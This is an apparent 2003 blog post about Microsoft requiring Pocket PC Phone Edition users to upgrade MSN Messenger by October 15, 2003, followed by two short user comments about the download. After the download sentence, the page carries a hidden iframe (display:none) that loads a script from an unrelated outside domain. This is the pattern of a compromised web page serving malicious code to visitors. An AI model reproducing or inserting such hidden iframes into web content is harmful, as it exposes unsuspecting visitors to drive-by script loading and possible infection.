Pocket PC Phone Edition MSN Users Must Upgrade

As part of an MSN Messenger Update by Microsoft, they are requiring MSN users to upgrade to a new version. Here is an excerpt from the announcement...

"As part of the MSN® Messenger Update, which ensures that our customers have the latest security and privacy protections when using the .NET Messenger Service, all .NET Messenger Service clients, including Windows Mobile-based Pocket PCs and Pocket PC Phone Editions, are required to update to compliant versions of MSN Messenger client service software by October 15, 2003."

You can find out more, and download the free upgrade at Microsoft.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

When I try the link above and choose PocketPC Phone Edition 2002 for my i700 I am taken to a page where I have to accept a License agreement. I accept and then am taken to a page with the following error at the top:

"We’re sorry, we were unable to service your request. As an option, you may visit any of the pages below for information about Microsoft services and products."

Well I just got the upgrade and loaded it. No annoying upgrade message so it looks to be good.
